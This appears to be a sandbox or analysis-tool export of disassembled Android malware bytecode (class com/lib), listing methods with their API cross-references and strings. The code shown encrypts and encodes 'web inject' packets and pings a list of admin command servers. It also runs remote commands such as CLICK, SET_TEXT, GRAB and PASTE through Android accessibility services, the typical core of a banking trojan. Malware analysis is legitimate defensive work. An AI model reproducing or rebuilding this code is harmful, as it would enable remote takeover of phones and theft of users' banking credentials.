                        59invoke-virtual {v1}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        60move-result-object v1
                        62invoke-virtual {v1}, Ljava/lang/String;->getBytes()[B
                        63move-result-object v1
                        65invoke-virtual {p0, v0, v1}, Lcom/lib;->rc4(Ljava/lang/String;[B)[B
                        66move-result-object v0
                        68invoke-virtual {p0, v0}, Lcom/lib;->bytesToHex([B)Ljava/lang/String;
                        69move-result-object v1
                        70new-instance v3, Ljava/lang/StringBuilder;
                        72invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        73const/4 v0, 0x1
                        75invoke-interface {v2, v0}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        76move-result-object v0
                        77check-cast v0, [B
                        79invoke-virtual {p0, v0}, Lcom/lib;->bytesToHex([B)Ljava/lang/String;
                        80move-result-object v0
                        82invoke-virtual {v3, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        83move-result-object v0
                        85invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        86move-result-object v0
                        88invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        89move-result-object v0
                        91invoke-virtual {p0, v0}, Lcom/lib;->hexStringToByteArray(Ljava/lang/String;)[B
                        92move-result-object v0
                        93const/4 v1, 0x0
                        95invoke-static {v0, v1}, Landroid/util/Base64;->encodeToString([BI)Ljava/lang/String;
                        96try_end_80: move-result-object v0
                        97goto_81: return-object v0
                        98catch_82: move-exception v0
                        99new-instance v1, Ljava/lang/StringBuilder;
                        101invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        103const-string v2, "[func] [makeWebInjPacket] T: "
                        105invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        106move-result-object v1
                        108invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        109move-result-object v0
                        111invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        112move-result-object v0
                        114invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        115const/4 v0, 0x0
                        116goto/16 :goto_81
                        Cross References
                        APIs
                        • org.json.JSONObject.getString
                        • java.lang.String.hashCode
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        Strings
                        • action
                        • SET_TEXT
                        • CLICK
                        • BACK
                        • HOME
                        • GRAB
                        • CHECK
                        • SELECT
                        • PASTE
                        • FOCUS
                        • SCROLL_DOWN
                        • SCROLL_UP
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x1
                        2const/4 v1, 0x0
                        3try_start_2:
                        4const-string v2, "action"
                        6invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        7move-result-object v3
                        8const/4 v2, -0x1
                        10invoke-virtual {v3}, Ljava/lang/String;->hashCode()I
                        11move-result v4
                        12sparse-switch v4, :sswitch_data_c4
                        13cond_10: packed-switch v2, :pswitch_data_f2
                        14move v0, v1
                        15goto_14: return v0
                        16sswitch_15:
                        17const-string v4, "SET_TEXT"
                        19invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        20move-result v3
                        21if-eqz v3, :cond_10
                        22move v2, v1
                        23goto/16 :goto_10
                        24sswitch_1f:
                        25const-string v4, "CLICK"
                        27invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        28move-result v3
                        29if-eqz v3, :cond_10
                        30move v2, v0
                        31goto/16 :goto_10
                        32sswitch_29:
                        33const-string v4, "BACK"
                        35invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        36move-result v3
                        37if-eqz v3, :cond_10
                        38const/4 v2, 0x2
                        39goto/16 :goto_10
                        40sswitch_33:
                        41const-string v4, "HOME"
                        43invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        44move-result v3
                        45if-eqz v3, :cond_10
                        46const/4 v2, 0x3
                        47goto/16 :goto_10
                        48sswitch_3d:
                        49const-string v4, "GRAB"
                        51invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        52move-result v3
                        53if-eqz v3, :cond_10
                        54const/4 v2, 0x4
                        55goto/16 :goto_10
                        56sswitch_47:
                        57const-string v4, "CHECK"
                        59invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        60move-result v3
                        61if-eqz v3, :cond_10
                        62const/4 v2, 0x5
                        63goto/16 :goto_10
                        64sswitch_51:
                        65const-string v4, "SELECT"
                        67invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        68move-result v3
                        69if-eqz v3, :cond_10
                        70const/4 v2, 0x6
                        71goto/16 :goto_10
                        72sswitch_5b:
                        73const-string v4, "PASTE"
                        75invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        76move-result v3
                        77if-eqz v3, :cond_10
                        78const/4 v2, 0x7
                        79goto/16 :goto_10
                        80sswitch_65:
                        81const-string v4, "FOCUS"
                        83invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        84move-result v3
                        85if-eqz v3, :cond_10
                        86const/16 v2, 0x8
                        87goto/16 :goto_10
                        88sswitch_70:
                        89const-string v4, "SCROLL_DOWN"
                        91invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        92move-result v3
                        93if-eqz v3, :cond_10
                        94const/16 v2, 0x9
                        95goto/16 :goto_10
                        96sswitch_7b:
                        97const-string v4, "SCROLL_UP"
                        99invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        100move-result v3
                        101if-eqz v3, :cond_10
                        102const/16 v2, 0xa
                        103goto/16 :goto_10
                        104pswitch_86:
                        105invoke-direct {p0, p1, p2}, Lcom/lib;->makeSetText(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        106move-result v0
                        107goto/16 :goto_14
                        108pswitch_8b:
                        109invoke-direct {p0, p1, p2}, Lcom/lib;->makeClick(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        110move-result v0
                        111goto/16 :goto_14
                        112pswitch_90:
                        113invoke-direct {p0}, Lcom/lib;->makeBack()Z
                        114move-result v0
                        115goto/16 :goto_14
                        116pswitch_95:
                        117invoke-direct {p0}, Lcom/lib;->makeHome()Z
                        118move-result v0
                        119goto/16 :goto_14
                        120pswitch_9b:
                        121invoke-direct {p0, p1, p2}, Lcom/lib;->makeGrab(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        122move-result v0
                        123goto/16 :goto_14
                        124pswitch_a1:
                        125invoke-direct {p0, p1, p2}, Lcom/lib;->makeSelect(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        126move-result v0
                        127goto/16 :goto_14
                        128pswitch_a7:
                        129invoke-direct {p0, p1, p2}, Lcom/lib;->makePaste(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        130move-result v0
                        131goto/16 :goto_14
                        132pswitch_ad:
                        133invoke-direct {p0, p1, p2}, Lcom/lib;->makeFocus(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        134move-result v0
                        135goto/16 :goto_14
                        136pswitch_b3:
                        137invoke-direct {p0, p1, p2}, Lcom/lib;->makeScrollDown(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        138move-result v0
                        139goto/16 :goto_14
                        140pswitch_b9:
                        141invoke-direct {p0, p1, p2}, Lcom/lib;->makeScrollUp(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        142try_end_bc: move-result v0
                        143goto/16 :goto_14
                        144catch_bf: move-exception v0
                        145move v0, v1
                        146goto/16 :goto_14
                        147nop
                        Cross References
                        APIs
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChildCount
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • android.view.accessibility.AccessibilityNodeInfo.getText
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • android.view.accessibility.AccessibilityNodeInfo.getText
                        • java.lang.CharSequence.toString
                        • java.lang.String.matches
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • android.view.accessibility.AccessibilityNodeInfo.getChildCount
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • java.lang.Integer.intValue
                        • java.lang.Integer.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • getElementByText[T]:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x0
                        2const/4 v0, 0x0
                        3try_start_2:
                        4invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        5move-result-object v0
                        6move-object v2, v0
                        7goto_7:
                        8invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        9move-result v0
                        11invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChildCount()I
                        12move-result v3
                        13if-ge v0, v3, :cond_7f
                        15invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        16move-result v0
                        18invoke-virtual {p1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        19move-result-object v0
                        21invoke-virtual {v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getText()Ljava/lang/CharSequence;
                        22move-result-object v0
                        23if-eqz v0, :cond_3e
                        25invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        26move-result v0
                        28invoke-virtual {p1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        29move-result-object v0
                        31invoke-virtual {v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getText()Ljava/lang/CharSequence;
                        32move-result-object v0
                        34invoke-interface {v0}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        35move-result-object v0
                        37invoke-virtual {v0, p2}, Ljava/lang/String;->matches(Ljava/lang/String;)Z
                        38move-result v0
                        39if-eqz v0, :cond_3e
                        41invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        42move-result v0
                        44invoke-virtual {p1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        45move-result-object v0
                        46goto_3d: return-object v0
                        47cond_3e:
                        48invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        49move-result v0
                        51invoke-virtual {p1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        52move-result-object v0
                        54invoke-virtual {v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChildCount()I
                        55move-result v0
                        56if-lez v0, :cond_5a
                        58invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        59move-result v0
                        61invoke-virtual {p1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        62move-result-object v0
                        64invoke-direct {p0, v0, p2}, Lcom/lib;->getElementByText(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        65move-result-object v0
                        66if-nez v0, :cond_3d
                        67cond_5a:
                        68invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        69move-result v0
                        70add-int/lit8 v0, v0, 0x1
                        72invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        73try_end_63: move-result-object v0
                        74move-object v2, v0
                        75goto/16 :goto_7
                        76catch_66: move-exception v0
                        77new-instance v2, Ljava/lang/StringBuilder;
                        79invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        81const-string v3, "getElementByText[T]: "
                        83invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        84move-result-object v2
                        86invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        87move-result-object v0
                        89invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        90move-result-object v0
                        92invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        93move-object v0, v1
                        94goto/16 :goto_3d
                        95cond_7f: move-object v0, v1
                        96goto/16 :goto_3d
                        Cross References
                        APIs
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChildCount
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • android.view.accessibility.AccessibilityNodeInfo.getViewIdResourceName
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • android.view.accessibility.AccessibilityNodeInfo.getViewIdResourceName
                        • java.lang.String.matches
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • android.view.accessibility.AccessibilityNodeInfo.getChildCount
                        • java.lang.Integer.intValue
                        • android.view.accessibility.AccessibilityNodeInfo.getChild
                        • java.lang.Integer.intValue
                        • java.lang.Integer.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • getElementByID[T]:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x0
                        2const/4 v0, 0x0
                        3try_start_2:
                        4invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        5move-result-object v0
                        6move-object v2, v0
                        7goto_7:
                        8invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        9move-result v0
                        11invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChildCount()I
                        12move-result v3
                        13if-ge v0, v3, :cond_7b
                        15invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        16move-result v0
                        18invoke-virtual {p1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        19move-result-object v0
                        21invoke-virtual {v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getViewIdResourceName()Ljava/lang/String;
                        22move-result-object v0
                        23if-eqz v0, :cond_3a
                        25invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        26move-result v0
                        28invoke-virtual {p1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        29move-result-object v0
                        31invoke-virtual {v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getViewIdResourceName()Ljava/lang/String;
                        32move-result-object v0
                        34invoke-virtual {v0, p2}, Ljava/lang/String;->matches(Ljava/lang/String;)Z
                        35move-result v0
                        36if-eqz v0, :cond_3a
                        38invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        39move-result v0
                        41invoke-virtual {p1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        42move-result-object v0
                        43cond_39: return-object v0
                        44cond_3a:
                        45invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        46move-result v0
                        48invoke-virtual {p1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        49move-result-object v0
                        51invoke-virtual {v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChildCount()I
                        52move-result v0
                        53if-lez v0, :cond_56
                        55invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        56move-result v0
                        58invoke-virtual {p1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        59move-result-object v0
                        61invoke-virtual {p0, v0, p2}, Lcom/lib;->getElementByID(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        62move-result-object v0
                        63if-nez v0, :cond_39
                        64cond_56:
                        65invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        66move-result v0
                        67add-int/lit8 v0, v0, 0x1
                        69invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        70try_end_5f: move-result-object v0
                        71move-object v2, v0
                        72goto/16 :goto_7
                        73catch_62: move-exception v0
                        74new-instance v2, Ljava/lang/StringBuilder;
                        76invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        78const-string v3, "getElementByID[T]: "
                        80invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        81move-result-object v2
                        83invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        84move-result-object v0
                        86invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        87move-result-object v0
                        89invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        90move-object v0, v1
                        91goto/16 :goto_39
                        92cond_7b: move-object v0, v1
                        93goto/16 :goto_39
                        Cross References
                        APIs
                        • java.util.List.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • org.json.JSONObject.toString
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.get
                        • java.lang.Object.equals
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • status
                        • [func] [pingAdmin] [
                        • ] T:
                        • [func] [pingAdmin] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x0
                        2try_start_1:
                        3invoke-virtual {p0}, Lcom/lib;->getAdminUrls()Ljava/util/List;
                        4move-result-object v0
                        6invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
                        7move-result-object v3
                        8goto_9:
                        9invoke-interface {v3}, Ljava/util/Iterator;->hasNext()Z
                        10move-result v0
                        11if-eqz v0, :cond_7a
                        13invoke-interface {v3}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        14move-result-object v0
                        15check-cast v0, Ljava/lang/String;
                        17invoke-virtual {p0, p1}, Lcom/lib;->makePingPacket(Landroid/content/Context;)Lorg/json/JSONObject;
                        18move-result-object v2
                        20invoke-virtual {v2}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        21move-result-object v2
                        23iget-object v4, p0, Lcom/lib;->timeout:Ljava/lang/Integer;
                        25invoke-virtual {p0, v0, v2, v4}, Lcom/lib;->sendPost(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Integer;)Ljava/lang/String;
                        26try_end_22: move-result-object v2
                        27if-eqz v2, :cond_9
                        28try_start_25: new-instance v4, Lorg/json/JSONObject;
                        30invoke-direct {v4, v2}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V
                        32const-string v2, "status"
                        34invoke-virtual {v4, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        35move-result v2
                        36if-nez v2, :cond_9
                        38const-string v2, "status"
                        40invoke-virtual {v4, v2}, Lorg/json/JSONObject;->get(Ljava/lang/String;)Ljava/lang/Object;
                        41move-result-object v2
                        43sget-object v4, Lcom/lib;->STRINGS_OK:Ljava/lang/String;
                        45invoke-virtual {v2, v4}, Ljava/lang/Object;->equals(Ljava/lang/Object;)Z
                        46try_end_3d: move-result v2
                        47if-eqz v2, :cond_9
                        48goto_40: return-object v0
                        49catch_41: move-exception v2
                        50try_start_42: new-instance v4, Ljava/lang/StringBuilder;
                        52invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        54const-string v5, "[func] [pingAdmin] ["
                        56invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        57move-result-object v4
                        59invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        60move-result-object v0
                        62const-string v4, "] T: "
                        64invoke-virtual {v0, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        65move-result-object v0
                        67invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        68move-result-object v0
                        70invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        71move-result-object v0
                        73invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        74try_end_62: goto/16 :goto_9
                        75catch_63: move-exception v0
                        76new-instance v2, Ljava/lang/StringBuilder;
                        78invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        80const-string v3, "[func] [pingAdmin] T: "
                        82invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        83move-result-object v2
                        85invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        86move-result-object v0
                        88invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        89move-result-object v0
                        91invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        92cond_7a: move-object v0, v1
                        93goto/16 :goto_40
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Thread.<init>
                        • java.lang.Thread.start
                        • java.lang.Long.longValue
                        • java.lang.Thread.join
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Throwable.printStackTrace
                        Strings
                        • [func] [allowOptimizationsIgnored] St4rt
                        • [func] [allowOptimizationsIgnored] isA11yInjected:
                        • [func] [allowOptimizationsIgnored] result:
                        • [func] [allowOptimizationsIgnored] TimeOut
                        • [func] [allowOptimizationsIgnored] Error:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3const-string v1, "[func] [allowOptimizationsIgnored] St4rt"
                        5invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        6new-instance v1, Ljava/lang/StringBuilder;
                        8invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        10const-string v2, "[func] [allowOptimizationsIgnored] isA11yInjected: "
                        12invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        13move-result-object v1
                        14sget-boolean v2, Lcom/lib;->isA11yInjected:Z
                        16invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        17move-result-object v1
                        19invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        20move-result-object v1
                        22invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        23new-instance v1, Lcom/lib$allowOptimizationsIgnoredRun;
                        25invoke-direct {v1, p0, p1, p3}, Lcom/lib$allowOptimizationsIgnoredRun;-><init>(Lcom/lib;Landroid/content/Context;Ljava/lang/String;)V
                        26new-instance v2, Ljava/lang/Thread;
                        28invoke-direct {v2, v1}, Ljava/lang/Thread;-><init>(Ljava/lang/Runnable;)V
                        30invoke-virtual {v2}, Ljava/lang/Thread;->start()V
                        32invoke-virtual {p2}, Ljava/lang/Long;->longValue()J
                        33move-result-wide v4
                        34const-wide/16 v6, 0x3e8
                        35mul-long/2addr v4, v6
                        37invoke-virtual {v2, v4, v5}, Ljava/lang/Thread;->join(J)V
                        39invoke-virtual {v1}, Lcom/lib$allowOptimizationsIgnoredRun;->getResult()Z
                        40move-result v0
                        42invoke-virtual {p0, p1}, Lcom/lib;->stopA11yInject(Landroid/content/Context;)V
                        43goto_3c: new-instance v1, Ljava/lang/StringBuilder;
                        45invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        47const-string v2, "[func] [allowOptimizationsIgnored] result: "
                        49invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        50move-result-object v1
                        52invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        53move-result-object v1
                        55invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        56move-result-object v1
                        58invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        59return v0
                        60catch_53: move-exception v1
                        61instance-of v2, v1, Ljava/lang/InterruptedException;
                        62if-eqz v2, :cond_5e
                        64const-string v1, "[func] [allowOptimizationsIgnored] TimeOut"
                        66invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        67goto/16 :goto_3c
                        68cond_5e: new-instance v2, Ljava/lang/StringBuilder;
                        70invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        72const-string v3, "[func] [allowOptimizationsIgnored] Error: "
                        74invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        75move-result-object v2
                        77invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        78move-result-object v2
                        80invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        81move-result-object v2
                        83invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        85invoke-virtual {v1}, Ljava/lang/Throwable;->printStackTrace()V
                        86goto/16 :goto_3c
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • android.view.accessibility.AccessibilityNodeInfo.getActionList
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.view.accessibility.AccessibilityNodeInfo.performAction
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [makeClick] search:
                        • [makeClick] element:
                        • [makeClick] [element] getActionList:
                        • makeClick:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3invoke-direct {p0, p1, p2}, Lcom/lib;->getElement(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        4move-result-object v1
                        5new-instance v2, Ljava/lang/StringBuilder;
                        7invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        9const-string v3, "[makeClick] search: "
                        11invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        12move-result-object v2
                        14invoke-virtual {v2, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        15move-result-object v2
                        17invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        18move-result-object v2
                        20invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        21if-eqz v1, :cond_53
                        22new-instance v2, Ljava/lang/StringBuilder;
                        24invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        26const-string v3, "[makeClick] element: "
                        28invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        29move-result-object v2
                        31invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        32move-result-object v2
                        34invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        35move-result-object v2
